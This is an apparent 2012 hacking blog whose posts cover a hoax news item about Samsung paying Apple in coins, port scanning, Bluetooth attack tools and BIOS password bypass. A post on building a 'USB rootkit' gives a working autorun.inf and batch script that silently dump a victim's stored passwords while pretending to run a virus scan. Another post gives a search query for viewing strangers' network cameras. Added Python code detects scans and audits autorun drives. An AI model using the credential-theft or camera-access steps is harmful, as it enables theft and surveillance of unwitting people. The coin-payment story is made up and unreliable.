Friday, August 31, 2012

Samsung Pays $1B to Apple



Yesterday, around 30 delivery trucks filled with 5-cent coins arrived at Apple’s headquarters in California.



At first, the security personnel in charge of the facility thought that the trucks were at the wrong place, but they were not. The Samsung CEO phoned the Apple CEO and confirmed that the trucks of billions of coins were for them. It was the payment of the charges resulting from the dispute between the two companies over a patent that Samsung allegedly copied from the iPhone.



Apple won over Samsung, but the contract has no clause saying how the payment is to be made. The Samsung CEO is a genius geek who knows how to play, and it's really funny when someone pays an obligation in a million pieces of coins. Haha!



Now, the questions are:



  1. How does Apple count the money in the fastest way? Will they hire additional crews for this?

  2. Is there a bank that would accept these tons of coins?





Lee Kun-Hee, Chairman of Samsung Electronics, told the media that his company is not going to be intimidated by a group of “geeks with style” and that if they want to play dirty, they also know how to do it. From: InfoLinkZone

A total of 20 billion coins; delivery is hoped to finish this week.

Let’s see how Apple will respond to this.



 

Source: https://www.facebook.com/InfoLinkZone

Thursday, August 30, 2012

Find a Port to Hack

What is a port scanner?

A port scanner is a handy tool that scans a computer looking for active ports. With this utility, a potential “hacker” can figure out what services are available on a targeted computer from the responses the port scanner receives. Take a look at the list below for reference.
Starting Scan.

Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.

Scanning for open ports is done in two ways. The first is to scan a single IP address for open ports. The second is to scan a range of IP addresses to find open ports.

Think of this as calling a single phone number, say 555-4321, and asking for every extension available. In scanning terms, the phone number is equivalent to the IP address and the extensions to open ports.

Scanning a range of IP addresses is like calling every number from 555-0000 to 555-9999 and asking for every extension available at every number.
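The two ways of scanning leave different traces in a firewall log, and a defender can tell them apart by counting. The following is an added example, not part of the original post: the log format, the addresses (documentation ranges) and the thresholds are all assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample firewall log; the first six ports are from the listing above.
PORTS = [7, 9, 13, 19, 21, 23]
SAMPLE_LOG = (
    [f"DENY TCP src=198.51.100.7 dst=192.0.2.10 dport={p}" for p in PORTS]
    + [f"DENY TCP src=203.0.113.9 dst=192.0.2.{h} dport=23" for h in range(1, 9)]
    + ["ALLOW TCP src=198.51.100.20 dst=192.0.2.10 dport=80",
       "ALLOW TCP src=198.51.100.20 dst=192.0.2.10 dport=25"]
)

LINE = re.compile(r"src=(\S+) dst=(\S+) dport=(\d+)")


def classify_scans(lines, min_ports=5, min_hosts=5):
    """Return sorted (source, kind, target, count) findings."""
    ports_by_host = defaultdict(set)   # (src, dst)   -> distinct ports tried
    hosts_by_port = defaultdict(set)   # (src, dport) -> distinct hosts tried
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue                   # skip lines that are not connection records
        src, dst, dport = m.group(1), m.group(2), int(m.group(3))
        ports_by_host[(src, dst)].add(dport)
        hosts_by_port[(src, dport)].add(dst)
    findings = []
    # One number, every extension: many ports tried on a single address.
    for (src, dst), ports in ports_by_host.items():
        if len(ports) >= min_ports:
            findings.append((src, "single-host port scan", dst, len(ports)))
    # Every number, one extension: the same port tried across many addresses.
    for (src, dport), hosts in hosts_by_port.items():
        if len(hosts) >= min_hosts:
            findings.append((src, "address-range sweep", f"port {dport}", len(hosts)))
    return sorted(findings)


if __name__ == "__main__":
    for finding in classify_scans(SAMPLE_LOG):
        print(*finding)
```

The source that only reaches ports 80 and 25 on one host stays below both thresholds and is not reported.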

Wednesday, August 29, 2012

Hacking Bluetooth Devices

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse of how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices


BlueScanner - BlueScanner searches for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.

BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.

BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specifications of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that support JSR-82, the Java Bluetooth specification.

BTCrawler - BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service queries. It implements the BlueJacking and BlueSnarfing attacks.

Hacking Bluetooth Devices


BlueBugger - BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain unauthorized access to the phone book, call lists and other private information.

CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only supports some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. It should work on any PocketPC with the Microsoft Bluetooth stack.

Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode.

Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.

Bluesnarfer - Bluesnarfer will download the phone book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flaw discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data.

BTCrack - BTCrack is a Bluetooth pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured pairing exchanges.

Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.

BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

I am not familiar with all of these tools, not even half of them to tell you the truth, but if you need to know where to download any of these tools, either message me or google them. If you need an explanation of how one works or how to make it work, message me with any question you need to ask. I'll tell you what I know, and I will research it and give you the best explanation possible.

How to Bypass BIOS Password?

This depends on what BIOS the machine has. Common BIOSes include AMI, Award, IBM and Phoenix. Numerous other BIOSes do exist, but these are the most common.

Some BIOSes allow you to require that a password be entered before the system will boot. Some BIOSes allow you to require that a password be entered before the BIOS setup may be accessed.

Every BIOS must store this password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the password. You must know the memory address where the password is stored, and the format in which the password is stored. Or, you must have a program that knows these things.

The most common BIOS password attack programs are for AMI BIOS. Some password attack programs will return the AMI BIOS password in plain text, some will return it in ASCII codes, and some will return it in scan codes. This appears to depend not just on the password attacker, but also on the version of AMI BIOS.

To obtain AMI BIOS password attackers, ftp to oak.oakland.edu/simtel/msdos/sysutil/.

If you cannot access the machine after it has been powered up, it is still possible to get past the password. The password is stored in CMOS memory, which is maintained while the PC is powered off by a small battery attached to the motherboard. If you remove this battery, all CMOS information will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machine's owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.

On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery.

Tuesday, August 28, 2012

Get Passwords Using USB Drive

Have you ever imagined that the pen drive or flash drive you are using for data transfers can be a hacking device?

Many tools exist for recovering these passwords from where they are stored. Using these tools and a USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassView: IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 – v6.0.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is the procedure for creating the password hacking toolkit.


NOTE: Please disable any antivirus software before doing this.

1. Download all 5 tools, extract them and copy only the executables (.exe files) onto your USB pendrive.

i.e.: Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.

2. Create a new Notepad file and write the following text into it.
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad file and rename it from New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

Code:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on any computer to sniff the stored passwords. Just follow these steps:

1. Insert the pendrive and the autorun window will pop up. (This is because we have created an autorun pendrive.)

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista.

NOTE: The author is not responsible for any damages you might face in using this tool. The main objective of this tutorial is to help you guys recover lost passwords on your computer.
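From the defender's side, a drive built this way is easy to recognise before it is ever opened in Explorer: its autorun.inf launches a program under a reassuring label, and the script it launches calls tools with the /stext switch. The following is an added example, not part of the original post: the function names and the list of runnable extensions are assumptions, and the sample file contents are constructed from the steps above.

```python
import configparser
import re

# Constructed copies of the files the procedure above puts on the drive.
AUTORUN_INF = "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n"
LAUNCH_BAT = ("start mspass.exe /stext mspass.txt\n"
              "start mailpv.exe /stext mailpv.txt\n"
              "echo done\n")

# Assumed list of extensions treated as "runs a program" for this check.
RUNNABLE = (".bat", ".cmd", ".exe", ".com", ".scr", ".vbs", ".js")
# "/stext <file>" is the save-to-text switch used in launch.bat above.
STEXT = re.compile(r"(\S+\.exe)\s+/stext\s+(\S+)", re.IGNORECASE)


def audit_autorun(inf_text):
    """Return what an autorun.inf would launch, or None if nothing."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True, delimiters=("=",))
    try:
        cp.read_string(inf_text)
    except configparser.Error:
        return None                      # not a parseable INF file
    for name in cp.sections():
        if name.lower() != "autorun":    # match [AutoRun], [AUTORUN], ...
            continue
        sec = cp[name]                   # configparser lower-cases the keys
        target = (sec.get("open") or sec.get("shellexecute") or "").strip()
        program = target.split()[0].lower() if target else ""
        return {"target": target,
                "label": (sec.get("action") or "").strip(),
                "runs_program": program.endswith(RUNNABLE)}
    return None                          # no [autorun] section


def dump_commands(script_text):
    """Return (tool, output_file) for every '/stext' invocation in a script."""
    return [(m.group(1).lower(), m.group(2))
            for m in STEXT.finditer(script_text)]


if __name__ == "__main__":
    print(audit_autorun(AUTORUN_INF))
    print(dump_commands(LAUNCH_BAT))
```

The script check keys on the /stext switch rather than on the file names from step 1, so it still matches if the executables are renamed.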

Monday, August 27, 2012

Watch Them Thru Their Cams

It was a question in my mind: "how can I access my mobile phone's camera from any computer with an internet connection?" Then, when I got bored again, I came up with the idea of tickling a network IP camera. That is, I figured out that accessing the live stream of your camera on your local machine gives you an unsecured URL path which can be viewed on any computer via the internet.


Let's have an example:


A network camera, whose brand name I prefer not to tell you for personal reasons, has a stream URL path containing "/viewerframe?mode=". I don't know if other network cams have the same URL content.


Now, we can look for establishments, organizations or public places that also use this kind of IP cam. Let us visit google.com and search the internet for any public IPs using the phrase inurl:"viewerframe?mode="





From the search results as shown above, just look at and take note of those links with a public IP address, as highlighted in the figure. Let's look into the first link which has a public IP in its URL. We have now accessed the camera live on our personal computer, as shown in the picture below. The good feature of this netcam brand is that you can control the view by turning the camera left, right, up, and down to see the whole place.



You may not be aware that, because of this vulnerability, others can view and watch you. Establishments using this kind of network camera are advised to update the firmware from the manufacturer's or vendor's website for this kind of product, to block others from accessing the network camera. Another solution is to change the username and password of your device. Please follow the instructions in your device manual.


I'll get back to you again and post additional hacking tips on network cameras.